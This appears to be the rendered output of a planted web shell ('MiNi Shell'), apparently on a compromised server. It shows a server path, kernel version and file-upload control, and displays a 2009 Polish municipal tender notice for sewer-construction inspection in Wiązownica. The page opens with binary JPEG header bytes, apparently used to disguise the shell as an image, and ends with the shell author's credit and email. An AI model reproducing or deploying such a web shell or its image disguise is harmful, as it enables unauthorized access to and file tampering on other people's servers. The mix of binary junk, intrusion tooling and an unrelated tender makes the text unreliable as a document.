JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42006-N-2009.html

<p class="kh_header"><b>Wiązownica: Pełnienie obowiązków inspektora nadzoru inwestycyjnego na zadaniu  
inwestycyjnym pn:  Budowa kanalizacji sanitarnej grawitacyjnej i tłocznej
z pompowniami  i zasilaniem energetycznym w miejscowości 
                                       Wiązownica.</b><br>
<b>Numer ogłoszenia: 42006 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.com  lub  www.bip-wiazownica.e-zet.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestycyjnego na zadaniu  
inwestycyjnym pn:  Budowa kanalizacji sanitarnej grawitacyjnej i tłocznej
z pompowniami  i zasilaniem energetycznym w miejscowości 
                                       Wiązownica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach planowanego zamówienia  wykonawca będzie sprawował nadzór inwestorski nad  wykonaniem  następujących elementów robót: 
Piwoda
- kolektory sanitarne z rur PVC typ N o 250 -       2 mb.
- kolektory sanitarne z rur PVC typ N o 200 -      34 mb.
- rurociągi  tłoczne z rur PE 80 SDR 17 o 125 -      7 mb.
- pompownia ścieków o 1500 - 1 kpl.  
- zasilanie energetyczne pompowni - instalacja odbiorcza.
Wiązownica
- kolektory sanitarne z rur PVC typ N o 200 -        882 mb.
- kolektory sanitarne z rur PVC typ S  o 200 -    7 799 mb.
- kolektory sanitarne z rur PVC typ N o 160 -        307 mb.
- kolektory sanitarne z rur PVC typ S  o 160 -    3 959 mb.
- rurociągi  tłoczne z rur PE 80 SDR 17 o   90 -     750 mb.
- rurociągi  tłoczne z rur PE 80 SDR 17 o 110 -   2 285 mb.
- rurociągi  tłoczne z rur PE 80 SDR 17 o 125 -      705 mb.
- przykanaliki z rur PVC typ N o 160 -  947 mb/189 szt.
- pompownie ścieków o 1400 - 4 kpl.
- zasilanie energetyczne pompowni - instalacja odbiorcza.
Wartość zamówienia  wynosi kwotę 3 069 123,78 zł. netto, która ustalona została na podstawie kosztorysu inwestorskiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą   wziąć  udział  wykonawcy  nie wykluczeni na podstawie art. 24 ust.  1 i 2   oraz  spełniający  wymogi   art. 22  ust. 1  ustawy  Prawo Zamówień Publicznych i warunki dodatkowe określone w SIWZ.
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym  i  osobami zdolnymi do wykonania zamówienia; 
-  udokumentują pełnienie obowiązków inspektora nadzoru inwestycyjnego   co    
   najmniej 1 inwestycji - sieci kanalizacji sanitarnej grawitacyjnej  i tłocznej z  
   pompowniami o wartości co najmniej 1 mln zł. w okresie ostatnich 3 lat, a jeżeli   
   okres działalności jest krótszy, to w tym okresie.  
-  dysponuje co najmniej 1 osobą  posiadającą uprawienia w specjalności 
   instalacyjno - inżynieryjnej  w zakresie sieci wodociągowych i kanalizacyjnych.
-  dysponują 1 osobą  w specjalności instalacyjno - inżynieryjnej w zakresie sieci 
    i instalacji elektrycznych lub instalacji elektrycznych.
-  dysponują 1 osobą  w specjalności konstrukcyjno - budowlanej .
-  wskazane w ofercie osoby muszą posiadać aktualne zaświadczenie o 
   przynależności do PIIB.
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
       zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
      Ocena spełniania warunków udziału w postępowaniu będzie prowadzona w oparciu o przedłożone dokumenty i oświadczenia na zasadzie spełnia/ nie spełnia.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
2.1. Wykonawców, którzy nie spełniają warunków o których mowa w art. 24 ust. 1 ustawy Prawo  zamówień publicznych, oraz wykonawców którzy;
2.1.1.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami  uczestniczącymi  w dokonywaniu tych czynności, chyba że udział tych 
wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2.1.2.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
2.1.3.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają   błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
2.1.4.	nie wnieśli wadium (jeżeli było wymagane), w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności oraz nie  podlega wykluczeniu na podstawie art. 24ust. 1 i 2 ustawy z dnia 29 stycznia  2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty określone w rozporządzeniu Prezesa Rady Ministrów  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty  mogą być składane, a  w szczególności: 
1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2. aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.3. aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.4. oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 i 24 ust. 1 i 2  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- załącznik nr 4.

2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:  
2.1. wykaz wykonanych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania usług nadzoru inwestorskiego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością usługom  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów referencje Inwestorów) potwierdzających,  że usługi nadzoru  zostały wykonane należycie; zał. nr 6
2.2. wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia a także zakresu wykonywanych przez nich czynności zał. nr 5
2.3. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt. 2.2.  wykonawca wskazał, którymi będzie dysponował.
2.4. Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich 3 lat, a w przypadku gdy okres działalności jest krótszy-  w tym okresie;
2.5. dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień; - do   wykazu należy dołączyć  następujące dokumenty potwierdzające posiadanie przez wskazane osoby uprawnienia:
       2.5.1. decyzję o stwierdzeniu przygotowania do wykonywania samodzielnych funkcji w budownictwie dla osób wskazanych w ofercie,
       2.5.2. ważne zaświadczenie o przynależności  osób wymienionych w wykazie do  właściwej izby inżynierów budownictwa.
oraz  pozostałe niezbędne dokumenty:
- formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
- kosztorys ofertowy (wycena usług)- zał. Nr 2
- parafowany projekt umowy  - zał. nr 3,
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność z oryginałem przez osobę - osoby uprawnioną do reprezentowania wykonawcy  we właściwym rejestrze lub ewidencji działalności gospodarczej. .
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1 ppkt. 1.1. - 1.4. składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty o których mowa w pkt. 1 i 2   powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu do składania ofert, natomiast dokument wymieniony w pkt. 3  powinien zostać wystawiony nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.

5. Wykonawcy wspólnie ubiegający  się o udzielenie zamówienia: 
5.1.W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego (konsorcjum) wykonawcy są  zobowiązani ustanowić pełnomocnika (lidera konsorcjum) do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy, które winno  zostać dołączone do oferty przetargowej.
5.2.Upoważnienie do pełnienia funkcji  PEŁNOMOCNIKA wymaga podpisu prawnie  
upoważnionych przedstawicieli każdego z partnerów w oryginale lub kopii potwierdzonych  notarialnie - które należy również załączyć je do oferty; 
5.3.Treść pełnomocnictwa powinna dokładnie określać zakres  udzielonego pełnomocnictwa.
5.4.Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełnić warunki  udziału w postępowaniu określone w dziale VIII. W pkt. 1.1 i 1.4  i złożyć na potwierdzenie spełniania tych warunków dokumenty wymienione w Dziale IX w oryginale lub kopii  potwierdzone za  zgodność z  oryginałem.
5.5.Warunki udziału w postępowaniu o udzielenie zamówienia publicznego  opisane w Dziale VIII pkt. 1.2 i 1.3.   wykonawcy  mogą spełniać  wspólnie.
5.6.Ponadto  Pełnomocnik podpisuje także Formularz oferty , kosztorys zał. nr 2, wykaz wykonanych usług- zał. nr 6,  wykaz  osób i podmiotów - zał. nr 5 i pozostałe dokumenty wymagane SIWZ.
5.7.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za  niewykonanie lub nienależyte wykonanie zobowiązań..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip-wiazownica.e-zet.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42   II p.
Cena specyfikacji 10 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 09:00, miejsce: Urząd Gminy Wiązownica
Sekretariat Urzędu
pok. nr 22   I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com